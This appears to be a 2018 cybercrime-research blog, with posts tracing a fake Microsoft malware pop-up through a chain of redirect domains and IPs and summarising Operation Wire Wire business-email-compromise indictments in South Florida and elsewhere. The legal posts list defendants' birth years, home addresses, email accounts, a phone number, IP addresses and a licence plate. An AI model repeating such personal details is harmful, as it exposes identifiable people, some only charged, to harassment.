Friday, June 15, 2018

Fake Malware Pop-up Example

I don't believe I've ever done a video blog, but I wanted to show you what it looks like when we look at a fake malware pop-up.  While I was prepping a lecture for a class I'm teaching by looking at something on Encyclopedia Britannica, I experienced a fake malware popup.

Here's what I saw:

"Serifed.Stream" malicious pop-up
The best way to explain this is to show it to you.  To do so, I've saved a little video of the what we saw.


In that walk through, you can see that the advertisement that led to the pop-up goes through a series of hops:

westerndigitalmeasure.com (192.241.254.144)  was the first site I hit, which had me do a POST to /j/pcl.php

(By the way, Westerndigitalmeasure.com is hosted at Cloudflare)

That PHP code sent me to "orgeles-hantests.com" (52.72.0.63) which immediately did a meta refresh to another page on orgeles-hantests.com which had a "redirect?target=(very long string here)"

That sent me to the host "redirect.orgeles-hantests.com" (54.89.11.221) which did another meta refresh to the site "server3.divinedessert.info" (67.207.82.78).

And divinedessert forwarded me to "serifed.stream" which is where we saw the fake Microsoft malware warning, which, by the way, captured and passed on my Internet service provider name and my home IP address in the URL.

We asked the URL scanner at VirusTotal check out "serifed.stream" and "serifed.stream/live/" but got the same result both ways.   0 of 68 URL reputation engines believe the site to be malicious.

Don't Worry, Be Happy, says 68 different URL Reputation Services

When we look by IP address, things aren't much better.  Of the hundreds of ".stream" addresses hosted on that same IP address, 185.44.65.141, which, by the way, is hosted in Iran, almost NOBODY found them to be malicious:



That last one shown, with 5 of 68 URL reputation services saying it might be bad, could also be interpreted as 63 out of 68 URL reputation services would have let your users see the bad content.  HOPEFULLY, they might have blocked a redirector somewhere in between, but honestly, I don't know . . . (this is the part where all of them will complain VirusTotal doesn't capture the totality of their user experience.  Yeah, yeah, yeah, cry me a river. I'm running AV and it happened to me!  Did you see the video?)



How to conclude?  I don't know.  Perhaps by just saying "the criminals are still ahead of us in this game, and this is why we can't have nice things."




Wednesday, June 13, 2018

Operation Wire Wire: the South Florida Cases Part 3

In the main DOJ Operation Wire Wire press release, the South Florida cases are described like this:

  • Following an investigation by the FBI and the U.S. Secret Service, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million from proceeds of BEC scams, including eight people charged in an indictment unsealed last week in Miami. These eight defendants are alleged to have conspired to launder proceeds from numerous BEC scams, totaling at least approximately $5 million, including approximately $1.4 million from a victim corporation in Seattle, as well as various title companies and a law firm.
In Part 1 we reviewed 17-CR-20748, the case against Destiny Asjee Rowland, Lourdes Washington, and Cynthia Rodriguez.  (See Operation Wire Wire: The South Florida Cases, Part 1 )

In Part 2 we reviewed 18-CR-20170, the case against Eliot Pereira, Natalie Armona, Melissa Rios, Bryant Ortega, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loayz.  (See Operation Wire Wire: The South Florida Cases, Part 2

Part 3 in our blog series focuses on those "eight people charged in an indictment unsealed last week in Miami", which refers to case 18-CR-20415, the case against Gustavo Gomez, Selene Joya, Jaremy Lucia Mena, Jose Brito Garcia, Jessica Hyde, Hillary Lee Williams, Juan Frias, and Ariel Champaign Edwards.

What links all of these cases together is that in each case, the ring leaders were recruited into their scam by the same individual: Roda Taher, who will be the focus of our next blog post "Operation Wire Wire: Who is Roda Taher?" 

The indictment begins with the statement:

"Roda Taher, aka Ressi, aka Rezi, hereinafter Taher, was the manager and supervisor of a criminal organization that engaged in money laundering by utilizing money mules and recruiters in the Southern District of Floirda, in other place in the United States, and in foreign commerce."

It then introduces our cast of characters.  As in South Florida case 1 and case 2, each of the players is recruited and instructed to set up a shell company, incorporating it in Florida, and establishing corresponding bank accounts with which to receive the proceeds of various Business Email Compromise and Spear Phishing attacks which fool company employees into wiring funds or transferring them via ACH, into the shell company accounts.

Defendant #1: Gustavo Gomez, b.1985, incorporated AG Universal Links in Hollywood, Florida.
Defendant #2: Selene Joya, b. 1990, incorporated Joya Star Life, Inc. in Miami Gardens, Florida.
Defendant #3: Jaremy Lucia Mena, b. 1992, incorporated Jaremy International, Inc. in North Miami, Florida.
Defendant #4: Jose Brito Garcia, b. 1981, incorporated Brito Commercial Products, Inc. in Hollywood, Florida.
Defendant #5: Jessica "Chuchi" Hyde, b.1987, incorporated Hyde Quality Inc. in Cutler Bay, Florida.
Defendant #6: Hillary Lee Williams, b. 1992, incorporated H Lee W Trade Group Inc. in Miami, Florida.
Defendant #7: Juan Frias, b. 1985, incorporated Ocean Surplus, Inc. in Miami, Florida.
Defendant #8: Ariel Champaign Edwards, b. 1991, incorporated Ariel Prime Trades Inc. in Miami, Florida.

Gustao Gomez worked closely with Roda Taher and other recruiters to recruit money mules and coach them in the manner in which they should set up their bank accounts.  According to the indictment:

"The recruiters would instruct money mules to open bank accounts in the name of their shell companies at various banks in the Southern District of Florida and elsewhere, and to falsely tell bank representatives that their shell company was a legitimate business engaged in the sale, import, or export of goods.  Taher and his recruiters gave different money mules a variety of false and fraudulent explanations regarding the nature of their businesses, including the sale, export, or import of textiles, furniture, electronics, or other goods.  However, the shell companies would not conduct any legitimate business."

"Once a money mule had opened a shell bank account in his or her shell company's name, those accounts would receive wire transfers of the proceeds of various fraudulent schemes.  The fraudulent schemes included, primarily, but were not limited to, email hacking or spoofing, also known as business email compromise and spearphishing scams.  Co-conspirators would hack into a victim's email account or otherwise take over that account without permission.  In a variation of this scheme, co-conspirators would "spoof" or create a fraudulent email account that was made to look like a victim's real email account.  The co-conspirators would then send email messages via the hacked or spoofed email accounts to individuals or corporations, instructing them to wire large sums of money to the money mules' shell bank accounts."

Roda Taher and the other recruiters would notify the mules when funds would be arriving into their accounts. These communications were primarily via the mobile phone encrypted messaging service WhatsApp.  They would be given instructions on what amounts would be received, where to wire the funds, and what commissions they were allowed to withdraw.  The commissions would be split with their recruiter, while the wires often sent the bulk of the money to China, Poland, and other destinations.

When banks closed the accounts, Taher would instruct the mules to open additional accounts at other banks.  Top performing mules were invited to become recruiters by inviting others to join the scheme as mules.  Recruiters received a percentage of the proceeds from the work of each mule they recruited.

The transactions particularly mentioned in the indictment are listed here. 

CountDateDefendantTransaction
202JUL2014Gustavo Gomez$48,500 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE
318JUL2014Gustavo Gomez$192,000 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE
419JUL2014Gustavo Gomez$4,500 from AG Universal Links' Wells Fargo Bank account to Zion Luxury Car Rental Inc.
501AUG2016Selene Joya$8,600 from Joya Star Life Inc's Bank of America Account
601AUG2016Selene Joya$5,500 from Joya Star Life Inc's Bank of America Account
701AUG2016Selene Joya$4,000 from Joya Star Life Inc's Bank of America Account
826JAN2017Jaremy Lucia Mena$78,902 from Jaremy International Inc's TD Bank account to Bella Tyre Co Ltd in China
926JAN2017Jaremy Lucia Mena$9,400 from Jaremy International Inc's TD Bank account
1013FEB2017Jose Brito Garcia$37,904 from Brito Commercial Products Inc's TD Bank account to Huge Elite Limited in Shanghai, China(*)
1117MAY2017Hillary Lee Williams$79,980 from H Lee W Trade Group's SunTrust Bank account to Redington Gulf FZE in Dubai, UAE
1206SEP2017Juan Frias$59,700 from Ocean Surplus Inc's TD Bank account to Zhejiang Oudi Machine Co. Ltd. in Zhejiang, China
1302NOV2017Ariel Champaign Edwards$8,200 from Ariel Prime Trade Inc's Wells Fargo account
1421NOV2017Ariel Champaign Edwards$700 from Ariel Prime Trade's Bank of America account

* - Worth noting that "Huge Elite Limited" in Shanghai, China was also the recipient of ill-gotten gains from Bryant Ortega in "Part 2."

This case is much "fresher" than some of the others.  The first arraignment in the case being Gustavo Gomez's appearance on May 31, 2018.  Gustavo just bonded out on June 11, 2018, for $50,000 posted by his girlfriend's brother.

Tuesday, June 12, 2018

Operation Wire Wire: the South Florida Cases Part 2

The Second South Florida case is linked to the first because this entire conspiracy also is part of the work of Roda Taher, AKA Ressi, AKA Rezi, the top recruiter in the first case.  However, in this 30 count indictment, the only one NOT named is Roda Taher.

Rezi recruited Eliot Pereira and Melissa Rios, below, who each in turn recruited others.




Defendant #1:  Eliot Pereira, b.1993 - opened "Eliot Products & Arts, Inc." and recruited and managed mules.
Defendant #2: Natalie Armona - opened "Armona Furniture Design Concept & Textile" and recruited and managed multiple mules and recruiters, including defendants #5, #8, #9, #10, and #12.
Defendant #3: Melissa Rios, b. 1996 - opened "Taihan Fiberoptics, Inc." and recruited #2
Defendant #4: Bryant Ortega, b. 1996 - opened "Bryant Tech Deals" and recruited and managed multiple mules, including Defendant #7. (4631 West 9th Court, Hialeah, FL 33012)
Defendant #5: Angelo Santa Cruz, b. 1994 - opened "ASC Worldwide, Inc" and recruited and managed multiple mules, including Defendants #6 & #11.
Defendant #6: Alexis Fernandez Cruz, b. 1992 - opened "Alexis Universal, Inc."
Defendant #7: Roberto Carlos Gracia, b. 1994 - opened RCG Deals, Inc.
Defendant #8: Jose E. Rivera, b. 1989 - opened Rivera Worldwide, Inc.
Defendant #9: Angeles De Jesus Angulo, b. 1996 - opened Angeles Premier Trades, Inc.
Defendant #10: Jennifer Ruiz, b. 1994 - opened Josette Quality, Inc.
Defendant #11: Yirielkys Pacheco Fernandez, b. 1984 - opened YF Nationwide, Inc.
Defendant #12: Sebastian Loayza, b. 1994 - opened Sure Trades, Inc.

This case starts off with a criminal complaint from the Miami office of the United States Secret Service.

It begins with his overview of the case, which is worth quoting here:

"Federal law enforcement agents have been investigating numerous business email compromise and spear phishing scams wherein various fraudsters targeted employees with access to company finances and tricked them into making wire transfers to bank accounts thought to belong to trusted partners -- except in fact, the accounts were shell companies controlled by the fraudsters.

Different people played different roles in the scheme.  Some of the co-conspirators hacked into and took control over certain victim companies' business email accounts without the knowledge or consent of the true email account holders, or created email accounts similar to, but slightly different from, real business email accounts.  Using the sham or compromised email accounts, the fraudsters then sent emails soliciting payments, claiming that funds were owed, and representing that payments for services rendered by the victim companies should be redirected to different accounts.

Other co-conspirators, known as money mules, opened shell companies and bank accounts into which the funds were fraudulently transferred, and then withdrew the fraud proceeds in cash, or wired the fraud proceeds into their foreign and domestic bank accounts.  Several money mules progressed to recruiting and managing other mules."

Natalie Armona may have been a good choice for Melissa to recruit based on her work.  Here's a Facebook post of hers from last year!  But by the dates, she had been in the money mule business quite a while before landing this job as a Junior Processor at a lending firm.


Armona's TD Bank account 

The complaint begins by telling the story of Natalie ARMONA, who opened a business, Armona Furniture Design Concept & Textile Inc., incorporating the business in Florida using her home address and opening a business checking account at TD Bank.  She was the sole signatory, and used her true social security number on the account.  The account was opened on December 9, 2106 and received its first wire December 14, 2016, from a scammed medical center (Victim Company A).  After taking out her commission in cash ($5,500) using her true Florida drivers license number as identity confirmation, Armona wired the rest of the money to "Flame Land International Limited" in Hong Kong.

On December 21, 2016, Armona's TD Bank account received an ACH for $724,395. Armona again paid herself first, withdrawing $10,508 in person.  Three wires went out.  $288,301 to "Caplan Sp Zoo" in Warszawa, Poland.  $194,110 to the same.  $94,218 to "Baolifeng Intl Trading Limited" in Shenzhen, China.  Armona paid herself twice more, once for $5,500 and once for $9400.  On December 27, 2016, she dipped three more times, for $800, $3800, and $9900.

Armona's SunTrust Bank account 

On December 9, 2016, Armona Furniture opened a SunTrust Bank account.  On December 30th she got an inbound ACH of $35,170 from a Pennsylvania sign company.  Also on December 30th, she got an incoming wire from Kukutula Development Company LLC in Koloa, Hawaii in the amount of $59,850.  On January 3, 2017, Armona withdrew $35,170.  On January 13, 2017, SunTrust closed the account for fraud with a balance of $59,850.

ASC WorldWide

A collaborating witness told the Miami Electronic Crimes Task Force that he had been recruited by Armona and had opened a shell company in the name ASC WorldWide, with accounts at TD Bank and Suntrust Bank.  Among other activities, he used email-based scams to cause $80,000 to be wired.

After a few successful jobs, the suspect said that Armona told him he could earn extra money by recruiting others into the scam.  He agreed to allow the USSS to record his emails, phone calls, and any text or WhatsApp communications involving others in the scheme.

The Ortega Case 

Although Bryant is not credited with recruiting Natalie Armona, the two are Facebook friends.  Bryant's profile also suggests that he may have had access to Personal Information, as an agent at a Health Insurance organization.  His cover photo indicates he's a fan of money!


The same USSS agent who did Armona's case also swore out the affidavit of criminal complaint against Bryant Ortega.  Ortega opened a TD Bank account for his new corporation, Bryant Tech Deals, which matched his home address of 2160 NW 111 Avenue, Sunrise, Florida 33322.  Bryant Tech Deals also opened a SunTrust account.  Both accounts were opened on February 13, 2017 and on March 6, 2017 the SunTrust account received an inbound wire of $283,750.50.  On March 7th, three withdrawals were made.  $500 from an ATM, $5600 over-the-counter, and $8400, also over-the-counter.  Ortega's true Florida drivers license was shown as proof of identify for the in-person withdrawals. Also on March 7, 2017, $94,110 was wired to "Huge Elite Limited" in Shanghai, China. After paying himself three more times the following day ($400 ATM, $800 at the counter, and $6200 at the counter), another wire of $128,705 went to Huge Elite Limited.  On March 9, 2017, an additional  $33,000 was wired out to "Lofty Ease Limited" in Shanghai, China.
(Ortega was arrested Jan 25, 2018)

The Pereira Case 

The third case, Feb 23, 2018, has an affidavit from Miami's FBI office from an agent who previously served as a Computer Scientist in the Philadelphia office! Pereira ran several schemes against companies by impersonating their officers, including Fakhoury Law Group (Troy, Michigan), High Tech Lending (San Diego, California), Gaumer Company (Houston, Texas), Park Corporation (Cleveland, Ohio), and Zija International (Lehi, Utah.)  Each of those companies received fraudulent emails, claiming to be from an executive of their own company, ordering that wires be sent to accounts controlled by "OS Fly Tech Incorporated."   Pereira hired an unnamed middle man to set up additional corporate accounts at Bank of America, Wells Fargo, SunTrust Bank, and Regions Bank.  The Middleman says that Pereira was working with an unknown male who he called "Rezi."  This would be the same person that Cynthia Rodriguez was working for (see Operation Wire Wire: The South Florida Cases, Part 1) Roda Taher.  Pereira and Rezi gave one of their mules an email os20technologies@gmail.com to use.


As shown above, nearly $1M in wires were sent to company accounts at Bank of America, SunTrust Bank,  TD Bank, and Wells Fargo Bank in September and October of 2016.  Pereira and his middleman communicated through WhatsApp and Email.  (954.554.5501 / bossmanweston@gmail.com / osflytechnologies@gmail.com )

The Big Picture 

Roda Taher, AKA Ressi, AKA Rezi, was the manager and supervisor of a criminal organization in the Southern District of Florida and elsewhere.  He recruited all of the defendants in this case, encouraged them to open shell accounts and receive illegally transferred funds, some of which they directly wired to China, Poland, and elsewhere.

The case involves 30 distinct financial transactions:
CountDateDefendantTransaction
202SEP2016Eliot Pereira$89,630 from OS Fly Tech's Wells Fargo account to China
330NOV2016Melissa Rios$13,844 from Tiahan Fiberoptics Inc's TD Bank account to Huzhou Nanmei Textile
423DEC2016Natalie Armona$288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
423DEC2016Natalie Armona$194,110 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
523DEC2016Natalie Armona$288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
623DEC2016Natalie Armona$94,218 from Armona Furniture's TD Bank account to Baolifeng Intl. Trading Limited in Shenzhen China
712JAN2017Natalie Armona$44,618 from Armona Furniture's TD Bank account to Hangzhou Jieenda Textile Co Ltd in China
807MAR2017Bryant Ortega$94,110 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China
908MAR2017Bryant Ortega$128,705 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China
1008MAR2017Bryant Ortega$6,200 from Bryant Tech Deal's SunTrust account
1128MAR2017Bryant Ortega$179,302 from Bryant Tech Deal's SunTrust account to Lofty Ease Limited in Shanghai, China
1214APR2017Roberto Carlos Garcia$3,500 from RCG Deals Inc's Bank of America account
1317APR2017Roberto Carlos Garcia$112,000 from RCG Deals Inc's Bank of America account to KT and G Corp
1417APR2017Roberto Carlos Garcia$7,000 from RCG Deals Inc's Bank of America account
1517APR2017Roberto Carlos Garcia$3,000 from RCG Deals Inc's Bank of America account
1628APR2017Jennifer Ruiz$39,841 from Josette Quality Inc's TD Bank account to Huzhou Nanmei Textile Co. Ltd.
1728APR2017Jennifer Ruiz$3,400 from Josette Quality Inc's TD Bank account
1804MAY2017Roberto Carlos Garcia$100 from RCG Deals Inc's Bank of America account
1926OCT2017Angelo Santa Cruz$88,950 from ASC Worldwide's Chase Bank account to Niche Holding Ltd.
2026OCT2017Angelo Santa Cruz$7,000 from ASC Worldwide's Chase Bank account
2101NOV2017Alexis Fernandez Cruz$8,600 from Alexis Universal Inc's TD Bank account
2207NOV2017Angelo Santa Cruz$96,500 from ASC Worldwide's TD Bank account to Zhejiang Oudi Machine Co. Ltd.
2307NOV2017Angelo Santa Cruz$8,500 from ASC Worldwide's TD Bank account
2409NOV2017Alexis Fernandez Cruz$8,500 from Alexis Universal Inc's SunTrust Bank account
2521NOV2017Yirielkys Pacheco Fernandez$34,810 from YF Nationwide Inc's Chase Bank account to Nantong Gomaa International Co. Ltd.
2606DEC2017Yirielkys Pacheco Fernandez$88,528 from YF Nationwide Inc's Chase Bank account
2730NOV2017Jose E. Rivera$54,210 from Rivera Worldwide Inc's Bank of America account to Zhejiang Senhuang Trading in Zhejiang, China
2830NOV2017Jose E. Rivera$6,100 from Rivera Worldwide Inc's Bank of America account
2903JAN2018Angeles De Jesus Angulo$79,400 from Angeles Premier Trades Inc's Wells Fargo Bank account to Farstar International Ltd
3003JAN2018Angeles De Jesus Angulo$8,600 from Angeles Premier Trades Inc's Wells Fargo Bank account

Altogether, this group is charged with laundering more than $5,000,000.

The case is scheduled to be heard in Jury Trial beginning on June 25, 2018 before Judge Marcia G. Cooke in Miami, Florida.

Tomorrow (June 13, 2018) two of the defendants are meeting to change their plea.  Jennifer Ruiz and Yirielkys Pacheco Fernandez have decided they may not want the 20 year sentence that all of them are facing as part of a conspiracy to commit money laundering at this level!

Operation Wire Wire: The South Florida Cases, Part 1

Yesterday we started a series of posts about Operation Wire Wire, where the Department of Justice announced charges against 74 people for Business Email Compromise and related scams.

The South Florida cases are so huge, we're actually going to break them into three parts as well.  In part one, we'll look at the case against Cynthia Rodriguez, Destiny Asjee Rowland, and Lourdes Washington.


Defendant #1: Cynthia Rodriguez:
18:1349.F Conspiracy to Commit Wire Fraud
18:1956-3300.F Conspiracy to Commit Money Laundering
18:1956-3300.F Money Laundering and Forfeiture Count

Defendant #2: Destiny Asjee Rowland
18:1343 Wire Fraud
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956 Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

Defendant #3: Lourdes Washington
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

According to the indictment against Destiny Asjee Rowland, Rowland incorporated "Asjee Luxury Inc" in July 2017 and claimed to be a furniture merchant wholesaler at 3688 NW 83rd Lane in Sunrise, Florida.  The victim companies in her case were a company in Eau Claire, Wisconsin, a lumber company in Illinois, and an escrow company in Roseville, California that was selling property for two people called "KW" and "TW" in the indictment.

Asjee Luxury opened accounts at TD Bank and SunTrust Bank.  Using other people's names and email addresses, she convinced companies to transfer money to her account, including by falsely claiming to be the lumber company, where she sent "urgent audit" notices to the Wisconsin company demanding immediate wire transfers of payments owed to the lumber company.  That email came from an IP address in Nigeria on July 27, 2017.  By July 28th, a Bank of America account in Wisconsin had sent $1,651,699 to her TD Bank account in Florida.

 She also caused the escrow company to redirect payments intended for their clients KW and TW to accounts she controlled, receiving $451,759 from a City National Bank account in California into her SunTrust Bank account in Florida on July 31, 2017.

Cynthia Rodriguez and Loudes Washington have a ten page criminal complaint written by a US Secret Service agent to describe their case.  Washington created a new business, LW Nationwide Inc, at 9561 Fountainebleau Blvd, Apartment 402, Miami, Florida 33172, which coincidentally is also his driver's license address.  Then he opened a Bank of America account in that name.

A Real Estate attorney, BD, was handling the closing on several pieces of property.  On Feb 14, 2017, he receives an email from ***@themarstongroup.com informing him that he would receive a check for $37,225 via registered mail, along with a 1099 tax form.  The next day, an email from the same name ***@gmx.us said that he was leaving town unexpectedly and needed the funds sent via wire transfer instead.  Those funds were then directed to the BofA account of LW Nationwide.  Those funds were immediately RE-wired to a bank account in Zhejiang, China.  The same day, Washington withdrew funds from an ATM in Hialeah, Florida.  Three minutes later, at the same ATM machine, Cynthia Rodriguez withdrew funds from the LW Nationwide account, using the same debit card as Washington.   Bank of America's logs reveal that an IP address, 50.143.68.4 was used to access the account.  That IP address was Rodriguez's home Comcast Cable account at 2914 Funston Street, in Hollywood, Florida.  Rodriguez made additional withdrawals from the account, including from a drivethrough ATM whose cameras captured the license plate of her Nissan Quest, 520-TML, registered to Rodriguez.

Washington was later arrested (December 2017) as a result of an open warrant in Kentucky, and testified to opening the accounts, making the wire transfers, and doing the cash withdrawals "at the behest of her recruiter/manager" who she did not identify.

Meanwhile, the Eu Claire, Wisconsin business contacted the US Secret Service about the scam involving the fake invoices from the lumber company.   Records from the state of Florida revealed that Asjee Luxury only had one officer, and one signatory on their bank accounts. What seems to be a cooperating witness (Individual 1) in that case revealed that Rodriguez had recruited them to open several sham business accounts, including the TD Bank account belonging to Asjee Luxury!  Shortly after the California real estate company wired money into that account, ATM video footage showed Individual 1 withdrawing $8,000 cash from the account.  Individual 1 would then give half of the money to Rodriguez and keep the other half.  Individual 1 also opened a shell company called Wide Assure Trades Inc and a corresponding Bank of America account.

On October 27, 2017, Rodriguez notified Individual 1 that Wide Assure Trades was going to receive some money.  That account was logged into the same day from 76.18.27.6, the IP address that Comcast listed for Rodriguez's home address at 2914 Funston Street, Hollywood Florida at that time.  (DHCP addresses change from time to time.)

Later an additional document, not an indictment, but rather "Superseding Information" was filed



The Superseding Information reveals that Cynthia Rodriguez had incorporated "CR Elegant Trades" in September 2014 from her home address in Hialeah, Florida.  We already spoke of Washington's company, LW Nationwide, and Rowland's company, Asjee Luxury.  The superseding information speaks of (but does not give many details) an ongoing conspiracy from 2014 until 2018 that involved the creation of many shell companies and many fraudulent wire transfers. 

"It was the purpose of the conspiracy for the defendants and their co-conspirators to unlawfully enrich themselves by obtaining and misappropriating money from victims, by making materially false and fraudulent representations, and by the concealment of material facts, concerning, among other things, the true identify of the defendants and their co-conspirators and the purported need for victims to make payments to the defendants and their co-conspirators."

Lourdes Washington entered a plea agreement that included the fact that she may face 20 years in prison, 3 years supervised release, and a fine of $250,000 or double the pecuniary gain, as well as restitution, and acknowledging that they may be "denaturalized and removed" as a result of their crimes.  In other words, Washington had a public defender, as the only funds they tie to her are $37,225.  (It will be interesting to see what actually happens at sentencing on July 9, 2018.)

Cynthia Rodriguez also plead guilty, but in her case, she named her recruiter.  In the plea agreement, she agrees that she and her co-conspirators opened shell corporations and bank accounts for the purpose of receiving proceeds of wire fraud scams in exchange for a percentage of profits.  But then she says she was recruited to the scam by Roda TAHER.  Taher, AKA Res, AKA Rezi, AKA Ressi, recruited Rodriguez initially as a money mule, but advanced her to being a sub-recruiter, working to hire and manage additional money mules in the South Florida area. Rodriguez was responsible for providing corporate documents for her mules' shell companies, driving the money mules to banks, or ordering them to open certain accounts at certain banks, and accompanying them to withdraw funds.  She also provided directions to money mules on how to hide their schemes from banks, law enforcement and other individuals.

Rodriguez's plea agreement states that she knew the money was coming from wire fraud, and that she knew that business email compromise and spear phishing scams were used, including email account takeovers and "spoofed" email accounts making the victims believe they were making wire transfers to trusted partners, but instead depositing the funds into the accounts of the fraudsters.  Rodriguez says that she used the phone application "WhatsApp" to exchange encrypted messages with co-conspirators, including Taher, in order to evade detection by law enforcement.  Her plea confesses to laundering at least $4,760,669.80 between herself and the mules she recruited.

Like Washington, Rodriguez's plea states that she may do 20 years plus 3 supervised, and pay a fine of $250,000 or double the pecuniary gain, plus restitution, and that she may face denaturalization and removal.

Base Offense level for Washington was 8.  Increased by 18 levls due to the amount of laundered funds being between $3.5M and $9.5M.  +3 because she was a manager or supervisor in a scheme involving 5 of more participants.  +2 because of 18USC1956, and +2 because of the "sophisticated nature" of the laundering.  So, a level 33 offense.  They only decreased her 3 levels for "demonstrating acceptance of responsibility and assisting authorities in the investigation".  So she is still facing a level 30 offense.

"Furthermore, the Defendant stipulates that she owes restitution in the amount of $4,760,669.80!"

The plea agreement was signed May 23, 2018.  Rodriguez will be sentenced on July 11, 2018.

In Operation Wire Wire: The South Florida Cases Part 2, we'll look at 18-CR-20170, with defendants Eliot Pereira, Natalie Armona, Bryant Ortega, Melissa Rios, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loyaza.

Monday, June 11, 2018

74 (Mostly Nigerians) Arrested in Business Email Compromise Action

Operation Wire Wire Cases 

Operation Wire Wire was announced June 11, 2018 by the Department of Justice.  This Operation led to the arrest of 42 people in the United States and 29 others in Nigeria, Poland, Canada, Mauritius, Indonesia, and Malaysia.  Not all of the case details have been made public yet, so this will be the first of several Operation Wire Wire blog posts.  What they all have in common is that they are all based on Business Email Compromise scams.


Case One: Okolie and Aisosa

Gloria Okolie ( 1:2018cr00029 ) - indicted in Georgia, arrested in Northern District of Texas on June 7, 2018.  She and Paul Aisosa, both Nigerian nationals residing in Dallas, are accused of laundering $665,000 in illicit funds.

Gloria opened a BBVA Compass Bank account in Addison, Texas in the name G.C. Investments and Logistics, with a $100 deposit.

Paul Wilson Aisosa opened an account at First National Bank of Texas in his own name at a branch in Killeen, Texas.  Someone using the email account 1234trot5@gmail.com sent emails to an attorney in Augusta, Georgia, who wired money from a sale of property to Okolie's BBVA Compass Bank account.  Some of these funds were wired to Paul's account from Gloria's account.

(A Facebook account in the name of Paul Aisosa checked into Dallas in April 2016)


Case Two: Odofuye, Nwoke, and Adejumo 

Adeyemi Odofuye (3:2016cr00232) (AKA Micky, AKA Micky Bricks, AKA Yemi, AKA GMB, AKA Bawz, AKA Jefe), is charged with a seven-count indictment in Connecticut for causing losses of $2.6 million, including $440,000 from a single victim in Connecticut.  (We'll call him Micky.)  According to his Facebook page, and the indictment, he recently graduated with a Masters of Science in Information Systems Security from Sheffield Hallam University.  One of Micky's email accounts was angelmicky_g41@yahoo.com.





















He is indicted in Connecticut along with Stanley Hugochukwu Nwoke (AKA Stanley Banks, AKA Hugo Banks, AKA Banks, AKA Banky, AKA Jose Calderon), who was a student at ApTech Computer Education in Lagos, Nigeria.

The two used a variety of custom domains to conduct fraud against an Austrian company with offices in Connecticut, including: veteranboats.org, messidepot.com, secondtow.info.  With these emails, they requested wire transfers to Technix Trade SP and Weequahic Group Inc.  Some of the funds were transferred to an HSBC account in Hong Kong.

The third party in this case, Olumuyiwa Yahtrip Adejumo (AKA Slimwaco, ACO Waco Jamon, AKA Hade, AKA Hadey) resided at 506 Hampton Avenue in Toledo Ohio.  (We'll call him Slimwaco.)  Slimwaco used his slimwaco@yahoo.com email addresses to communicate with praxes123@gmail.com both by email and Google chat.  He also sent numerous fraudulent emails to a company in Connecticut posing as the CEO of that company and causing five wire transfers to be sent "by his authorization" totalling more than $500,000.  Other emails he controlled included slimwaco@yahoo.com, kkssus@gmail.com, waco4real82@yahoo.com, slimhade@yahoo.com.  According to his Facebook page (in the name Adeola Crown Adejumo), he was originally from Ibadan, Nigeria.

The New Haven-based FBI agent who wrote the criminal complaint describes in detail the types of communications between the accounts, as Slimwaco sent a list of the CFOs of 100 Ohio-based companies to one of his colleagues, and another with more than 100 Illinois-based CFOs.  In other exchange, Micky and Slimwaco chat and help each other build lists of officers from public webpages and corporate directories.

Odfuye (Micky) was extradicted from the UK.  Nwoke was extradicted from Mauritius, the first extradiction from there in 15 years!

Case 3:  Idris, Shitu, Nyamekye, Ibrahim, and Bolorunduro 

The Western District of Pennsylvania announced their own case as part of Operation Wire Wire, namely the arrest of Taiwo Musiliudeen Idris and four co-conspirators.  Idris was one of 29 scammers arrested in Nigeria as part of this operation.  Idris worked with Ismail Shitu, Nathanael Nyamekye, Adnan Ibrahim, and Akintayo Bolorunduro to launder over $411,000 in real estate settlements via BEC.  Their scam primarily targeted residential real estate sellers in Maryland. 

The indictment against these four, (Case 2:17-cr-00192-AJS) was filed October 5, 2017 in Pittsburgh and covers three distinct BEC Scams.

BEC Scam #1 - Rockville, Maryland.  A married couple who were selling a home were anticipating the receipt of a wire for $411,548.06 in proceeds.  However a fraudulent fax caused the funds to be redirected to an account at Citizens Bank in New York, controlled by Ismail Shitu, who resides in the Western District of Pennsylvania.

BEC Scam #2 - Hopkinton, Massachusetts.  A married couple waiting to receive $212,961.75 for the sale of a home had the same experience.  The attorney who was to handle the funds transfer received fraudulent correspondence directing him to send the funds to a Suntrust Bank account in Clinton, Maryland, also controlled by the criminals.

BEC Scam #3 - Charlotte, North Carolina.  A real estate developer sold four parcels of land for $235,058.53.  Once again, the lawyer handling the case received a fax, from the same number as the two cases above, (760) 297-5626, instructing him to send the money to a SunTrust Bank account in McDonough, Georgia.

These funds were then laundered by transfers of funds from $30,000 to $104,000 to various shell companies controlled by members of the conspiracy.   Companies such as "Remy Tire Mart" and "Salem's Market and Grill" and "Sea Gull Freight LLC" and "Stability Capital Group" all received transfers of the funds from BEC Scam #1.

Remy Tire Mart also received funds from BEC Scam #2.  BEC Scam #3 also sent funds to Miken Auto LLC, Labor of Love, and OOPS!  Nathanael Nyamekye, who took $5,000 in an account in his true name.

Case 4: South Florida

We'll continue the Operation Wire Wire reporting as more cases are made public.  In South Florida, 23 individuals have been charged with laundering at least $10 Million from BEC scam proceeds, including 8 from a new indictment unsealed in Miami last week.   Reviewing the three related federal cases will be our next blog topic.

Monday, May 28, 2018

Affiliate Movie Streaming Scam Service

Dear readers,

I'm sharing some information here wondering if anyone can identify the criminal affiliate program at the root of this scam service.

The scam begins with what seems to be an automated bot-response posted on Facebook.  One of the outstanding questions -- can anyone identify a bot that is making these spammy posts?  These are a few examples from many thousands observed over the past week.

